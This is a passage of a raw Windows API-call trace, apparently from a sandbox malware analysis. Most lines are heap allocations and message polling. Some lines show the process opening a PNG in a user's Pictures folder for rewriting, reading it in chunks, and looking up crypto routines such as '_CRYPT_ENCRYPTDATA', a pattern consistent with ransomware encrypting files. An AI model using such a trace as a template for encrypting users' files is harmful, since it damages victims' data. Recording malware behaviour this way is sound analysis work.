| out: lpNewFilePointer=0x0) returned 1 [0189.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0189.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0189.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0189.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0189.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0189.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0189.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.821] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0189.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0189.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0189.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0189.821] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0189.821] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0189.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0189.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0189.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0189.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0189.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0189.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0189.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0189.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0189.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0189.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0189.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0189.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0189.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0189.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0189.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0189.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0189.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0189.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0189.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0189.823] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat")) returned 0x10 [0189.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0189.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0189.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0189.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0189.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0189.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0189.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0189.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0189.825] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.flyingship.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\qiez.flyingship.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0189.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0189.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0189.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0189.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0189.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0189.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0189.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0189.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.826] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0189.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0189.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0189.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0189.826] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0189.827] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0189.827] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0189.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0189.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0189.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0189.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0189.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0189.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0189.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0189.828] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0189.828] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0189.832] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x8b97, lpOverlapped=0x0) returned 1 [0189.832] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0189.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0189.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0189.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18b97) returned 0xbea018 [0189.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0189.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0189.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0189.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0189.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18b97) returned 0xa5f008 [0189.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0189.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.837] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0189.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18b97) returned 0xbea018 [0189.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0189.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0189.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0189.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.837] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0189.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0189.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0189.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0189.838] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0189.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.838] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0189.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0189.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0189.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0189.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18b97) returned 0xbea018 [0189.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0189.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0189.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0189.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0189.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0189.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0189.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0189.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0189.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd930 [0189.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0189.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0189.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0189.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0189.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0189.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18b97) returned 0xa77ba8 [0189.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0189.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0189.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0189.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0189.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0189.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0189.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0189.841] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0189.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0189.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0189.841] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0189.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0189.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.842] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0189.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0189.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0189.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28d8 [0189.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0189.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0189.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0189.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0189.842] 